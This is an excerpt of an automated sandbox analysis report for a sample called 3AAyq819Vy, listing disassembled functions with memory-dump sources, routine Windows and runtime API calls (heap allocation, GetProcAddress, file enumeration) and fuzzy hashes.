                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 06f589250ea5cd0b4b557afc9cf1ca550cb546139e579e3163468bf61aa8c346
                                                                                              • Instruction ID: 8cb0917ee35e81019c97e0b45078d89fc6d4bb154380658aa573dedea478b2ee
                                                                                              • Opcode Fuzzy Hash: 06f589250ea5cd0b4b557afc9cf1ca550cb546139e579e3163468bf61aa8c346
                                                                                              • Instruction Fuzzy Hash: 95C1B270A002569FEF15DF68C498BAD7BA5AF16318F0C01BAEC559F392DB309A44CB61
                                                                                              Function 00CA3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: c3bf72e2c86b81d51d35629488d08b9bb7463ce0d48a91f3c972966e76d30c33
                                                                                              • Instruction ID: 60fe286bca3253e9f081afe30bd0c40e12f8b656a512a398412c86309ded017b
                                                                                              • Opcode Fuzzy Hash: c3bf72e2c86b81d51d35629488d08b9bb7463ce0d48a91f3c972966e76d30c33
                                                                                              • Instruction Fuzzy Hash: C371E371500B869ECB35DB70CC659E7B7E9AF16308F40092EF5AB87241DA326A84DF11
                                                                                              Function 00CA8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA8289
                                                                                                • Part of subcall function 00CA13DC: __EH_prolog.LIBCMT ref: 00CA13E1
                                                                                                • Part of subcall function 00CAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 2506663941-0
                                                                                              • Opcode ID: ed78d59c1bad5442aca094409eec97ae0a1d768379d413f4cc84c72b54b1d47a
                                                                                              • Instruction ID: f2149ea4ffa1f45331ee09f66ef75a1c66fa2eb9167eda1bdd9c3b2fc1859960
                                                                                              • Opcode Fuzzy Hash: ed78d59c1bad5442aca094409eec97ae0a1d768379d413f4cc84c72b54b1d47a
                                                                                              • Instruction Fuzzy Hash: BB41D97194465A9BDF20DBA0CC55BEAB7B8AF05308F4404EBE59A97093EB705FC8DB10
                                                                                              Function 00CA13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA13E1
                                                                                                • Part of subcall function 00CA5E37: __EH_prolog.LIBCMT ref: 00CA5E3C
                                                                                                • Part of subcall function 00CACE40: __EH_prolog.LIBCMT ref: 00CACE45
                                                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 1b5e8fee8dd210be994fb1259bdad8dc7de02b03f3c1f017d35dbe54f0d59fbf
                                                                                              • Instruction ID: fbde5d6e3b03f00f26118e1160291529480a6ec351ab9a8ee8adb268dd89c61c
                                                                                              • Opcode Fuzzy Hash: 1b5e8fee8dd210be994fb1259bdad8dc7de02b03f3c1f017d35dbe54f0d59fbf
                                                                                              • Instruction Fuzzy Hash: 054147B0905B419EE724CF798885AE6FBE5BF19304F54492EE5FE83282CB316654DB10
                                                                                              Function 00CA13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA13E1
                                                                                                • Part of subcall function 00CA5E37: __EH_prolog.LIBCMT ref: 00CA5E3C
                                                                                                • Part of subcall function 00CACE40: __EH_prolog.LIBCMT ref: 00CACE45
                                                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 2efb44216400c9672d5ad5f3987943baf1283b97276c84d418fffecc37ad0f23
                                                                                              • Instruction ID: 5574314b0bf98540ad5c99fa6bb88a3bb48103ee7335f4a1cb3b001bac8be482
                                                                                              • Opcode Fuzzy Hash: 2efb44216400c9672d5ad5f3987943baf1283b97276c84d418fffecc37ad0f23
                                                                                              • Instruction Fuzzy Hash: 714168B0905B419EE724CF798885AE7FBE5BF19300F54492ED5FE83282CB316654DB10
                                                                                              Function 00CBB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CBB098
                                                                                                • Part of subcall function 00CA13DC: __EH_prolog.LIBCMT ref: 00CA13E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 0db2852ad63e4633bff54f847563d0cc8cf022c712d1fc9a9b45728c14eb357e
                                                                                              • Instruction ID: 7b94e55d2d1876aebde0e1fccbc3e4102df2a8aefeaf04ebcdc1ced736083634
                                                                                              • Opcode Fuzzy Hash: 0db2852ad63e4633bff54f847563d0cc8cf022c712d1fc9a9b45728c14eb357e
                                                                                              • Instruction Fuzzy Hash: BD316B75C0024AAECF15DFA9D851AEEBBB4AF09304F14449EE80AB7242D775AF04DB61
                                                                                              Function 00CCAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00CCACF8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: c1f79f39034a3761fef784f032f43102851288a8ca8eaa6258bee92c9f76841e
                                                                                              • Instruction ID: 32c009f9b490696ba17fd7d7969eb92c8338e2c2280fb467e6e42d83479ae3e4
                                                                                              • Opcode Fuzzy Hash: c1f79f39034a3761fef784f032f43102851288a8ca8eaa6258bee92c9f76841e
                                                                                              • Instruction Fuzzy Hash: 84113A33A012396F8F219F1DDC88F5A7395EB843287164225FD26EB244D731DD0187D2
                                                                                              Function 00CACE40 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CACE45
                                                                                                • Part of subcall function 00CA5E37: __EH_prolog.LIBCMT ref: 00CA5E3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 8a90f7df75def186b14c8a4c68ed4962156eb44b743158da701ac334b59bebac
                                                                                              • Instruction ID: 8a9956d129263c8196f259d862b51f51c8ddc761928fac2d0f18121ab1e91787
                                                                                              • Opcode Fuzzy Hash: 8a90f7df75def186b14c8a4c68ed4962156eb44b743158da701ac334b59bebac
                                                                                              • Instruction Fuzzy Hash: E311C271A01245DEEB14EB79C545BEEBBE89F86308F10445EE446D3382DB784F00DB62
                                                                                              Function 00CA9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: eda4e6d7afcc9ffffb5099c448ad591eebaee2ceb9efbafc7b9d266e5e0ec1d9
                                                                                              • Instruction ID: d8b47f7235fbd6ecf5f3cb8216032b308d2a50839162fba735ace37f78154178
                                                                                              • Opcode Fuzzy Hash: eda4e6d7afcc9ffffb5099c448ad591eebaee2ceb9efbafc7b9d266e5e0ec1d9
                                                                                              • Instruction Fuzzy Hash: 1801A933D00526ABCF11AB68CC82ADEB731FF8A754F054215F813B7151DA348D00D7A0
                                                                                              Function 00CCC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CCB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC9813,00000001,00000364,?,00CC3F73,00000050,?,00CE1030,00000200), ref: 00CCB177
                                                                                              • _free.LIBCMT ref: 00CCC4E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                              • Instruction ID: 872a585359015c3ddd06e0a6c8a157f4de8b4457ce9ebc01a2bedffffbb2e35f
                                                                                              • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                              • Instruction Fuzzy Hash: 4A01D6726003056BE335CE69D885E6AFBEDEB85370F25451DE59893281EA30A905C764
                                                                                              Function 00CCB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC9813,00000001,00000364,?,00CC3F73,00000050,?,00CE1030,00000200), ref: 00CCB177
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: d12130144de017966c909c29c09a7b099cdb54f8589aae662ab50801ba169cb0
                                                                                              • Instruction ID: 7e59f13d82fe2537bf3b66a083ba31c1ed47a466a1898d9e4eca3c030cafff26
                                                                                              • Opcode Fuzzy Hash: d12130144de017966c909c29c09a7b099cdb54f8589aae662ab50801ba169cb0
                                                                                              • Instruction Fuzzy Hash: 97F0543250556567DB215AA2EC1BF9F7748EB41770F1D8219F81896190CB21DE0196E0
                                                                                              Function 00CC3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00CC3C3F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              • Opcode ID: 28b28a942fb19f75631541f16bb5e5dc503f3e9f6f22e3d58120cbae4dbbb5c7
                                                                                              • Instruction ID: ef1a07cb5b562f6e9f0231cac67ffb6d77b70a2be5b11eb45af418ff1f576b68
                                                                                              • Opcode Fuzzy Hash: 28b28a942fb19f75631541f16bb5e5dc503f3e9f6f22e3d58120cbae4dbbb5c7
                                                                                              • Instruction Fuzzy Hash: 57F0A7362002969FCF124E69FC04F9E7799EF01B60714C229FA25E7190DB31DB20D7A0
                                                                                              Function 00CC8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CCCA2C,00000000,?,00CC6CBE,?,00000008,?,00CC91E0,?,?,?), ref: 00CC8E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: e474eaf85e22324db0a9141ed0d9c102efd4751cd596c73c6598afd2f3de9be5
                                                                                              • Instruction ID: e89f3fcff941e8464eb54fcee098f40e37034a79d347675917e07362885205e9
                                                                                              • Opcode Fuzzy Hash: e474eaf85e22324db0a9141ed0d9c102efd4751cd596c73c6598afd2f3de9be5
                                                                                              • Instruction Fuzzy Hash: D3E06D3960622566EB7126A6DC09F9F76489B817B4F15012DEC2896592CF21CE0592E1
                                                                                              Function 00CA5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA5AC2
                                                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 9c9fc3c2ab68bda1f2d31a6a3680170e5fea35bb9611feab4a938128cc7e4804
                                                                                              • Instruction ID: 88471ded6a780e408572fee993c4f5c9d3ac52ae9b0f5c1d289840b6051a24f5
                                                                                              • Opcode Fuzzy Hash: 9c9fc3c2ab68bda1f2d31a6a3680170e5fea35bb9611feab4a938128cc7e4804
                                                                                              • Instruction Fuzzy Hash: C3018C30810694DAD729E7B8C0417DEFBB49F64308F60848EA85653283CBB41B08E7A2
                                                                                              Function 00CAA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6C4
                                                                                                • Part of subcall function 00CAA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6F2
                                                                                                • Part of subcall function 00CAA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6FE
                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1464966427-0
                                                                                              • Opcode ID: 7271c7d6d5f472a0c76357ae583676ebad3d6433865c57dd79861e3da53750a2
                                                                                              • Instruction ID: c765d1c8c006efb9ed904824350b9851f5e24886d95b075237d32bd962d63aaf
                                                                                              • Opcode Fuzzy Hash: 7271c7d6d5f472a0c76357ae583676ebad3d6433865c57dd79861e3da53750a2
                                                                                              • Instruction Fuzzy Hash: C5F08231409791ABCB225BB48904BCBBB906F1B339F048A4AF1FD52196C37554A4EB23
                                                                                              Function 00CB0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00CB0E3D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
